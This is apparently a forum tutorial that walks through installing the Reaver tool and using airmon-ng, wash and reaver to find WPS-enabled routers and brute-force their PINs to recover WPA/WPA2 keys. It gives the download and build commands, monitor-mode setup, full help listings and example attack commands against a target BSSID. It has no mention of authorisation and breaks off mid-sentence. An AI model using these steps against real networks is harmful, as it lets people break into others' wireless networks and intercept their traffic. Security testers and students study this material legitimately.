
Reaver Tutorial [wpa/wpa2]

* You can download Reaver here: http://code.google.com/p/reaver-wps/downloads/list


Or type in the terminal:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Then extract it:
tar -xvf reaver-1.4.tar.gz

Enter the folder:
cd reaver-1.4/src

Then install it with:
./configure
make
make install

And that's it, it is now installed.


Now to check for vulnerable networks
* Put the wireless card in monitor mode:
airmon-ng start wlan0

* To search for vulnerable networks, type:


wash -i mon0

wash syntax:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -h, --help                           Show help

Example:
    wash -i mon0

* Note down the Wi-Fi details such as the access point (B4:5D:3F:XX:XX:XX) and channel

and then run reaver.
Example usage: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv
Reaver syntax:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

In my case it has taken me anywhere from three hours up to 98 hours to get the WPA key.
Here I leave you some